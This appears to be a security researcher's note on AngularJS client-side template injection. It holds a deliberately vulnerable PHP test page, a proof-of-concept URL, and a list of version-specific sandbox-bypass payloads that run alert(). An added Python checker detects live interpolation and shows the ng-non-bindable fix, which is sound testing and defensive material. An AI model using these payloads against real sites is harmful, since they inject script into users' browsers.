Tag:angularjs

Client-side template injection with AngularJS causes XSS

I often meet AngularJS when I test websites, so I want to make a note.

```html
<html ng-app>
<head>
<script src="./angular.js"></script>
</head>
<body>
<p>
<?php
$q = $_GET['q'];
//echo $q;
echo htmlspecialchars($q, ENT_QUOTES);
?>
</p>
</body>
</html>
```

htmlspecialchars() only rewrites <, >, &, " and ', so the braces pass through untouched and AngularJS interpolates the reflected value as an expression.

POC: {{$id}} or {{1+1}}

POC: http://127.0.0.1:8999/lsawebtest/vulenv/misc/angular-xss/test.php?q={{%27a%27.constructor.prototype.charAt=[].join;$eval(%27x=1}%20}%20};alert(0)//%27);}}

//If you are interested in it, you can research how to bypass the sandbox.

Two cases:
https://www.freebuf.com/vuls/125932.html
http://www.secevery.com:4321/bugs/wooyun-2016-0190247

List of sandbox bypasses from PortSwigger:

1.0.1 – 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}

1.2.0 – 1.2.1 Jan Horn (Google)
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 – 1.2.5 Gareth Heyes (PortSwigger)
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 – 1.2.18 Jan Horn (Google)
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 – 1.2.23 Mathias Karlsson
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 – 1.2.29 Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0 Gábor Molnár (Google)
{{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )) );}}

1.3.1 – 1.3.2 Gareth Heyes (PortSwigger)
{{ {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=''.valueOf; $eval('x=alert(1)//'); }}

1.3.3 – 1.3.18……
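As an added example (not code from the original post or from AngularJS), the Python below mimics the PHP echo above with html.escape, shows that the post's benign probes stay live after HTML escaping because the browser decodes entities before AngularJS reads the DOM, and shows the ng-non-bindable fix; the helper names (render_untrusted, live_expressions, check_probes) are assumptions of this example.

```python
import html
import re
from html.parser import HTMLParser

# AngularJS default interpolation delimiters; HTML escaping never touches braces.
INTERPOLATION = re.compile(r"\{\{.+?\}\}", re.S)

def render_untrusted(value, non_bindable=False):
    """Mimic the post's PHP: echo htmlspecialchars($q, ENT_QUOTES).
    non_bindable=True adds ng-non-bindable, which stops interpolation."""
    attr = " ng-non-bindable" if non_bindable else ""
    return f"<p{attr}>{html.escape(value, quote=True)}</p>"

class _BindingScanner(HTMLParser):
    """Collect {{...}} in text and attribute values with no ng-non-bindable
    ancestor. HTMLParser decodes entities first, as the browser does."""
    VOID = {"br", "img", "input", "meta", "link", "hr"}  # never get an end tag

    def __init__(self):
        super().__init__()
        self.stack, self.findings = [], []  # stack: is each open element non-bindable?

    def handle_starttag(self, tag, attrs):
        if tag not in self.VOID:
            self.stack.append(any(n == "ng-non-bindable" for n, _ in attrs))
        if not any(self.stack):  # attribute values are interpolated too
            for _, val in attrs:
                self.findings += INTERPOLATION.findall(val or "")

    def handle_endtag(self, tag):
        if tag not in self.VOID and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        if not any(self.stack):
            self.findings += INTERPOLATION.findall(data)

def live_expressions(markup):
    """Return the expressions AngularJS would still evaluate in markup."""
    scanner = _BindingScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings

def check_probes():
    """The post's benign probes through the vulnerable echo and the fixed one."""
    probes = ["{{1+1}}", "{{$id}}", "{{'a'.constructor}}"]  # quote gets entity-encoded
    return [(live_expressions(render_untrusted(p)),
             live_expressions(render_untrusted(p, True))) for p in probes]
```

An empty list from live_expressions is the condition a regression test for this page should assert on.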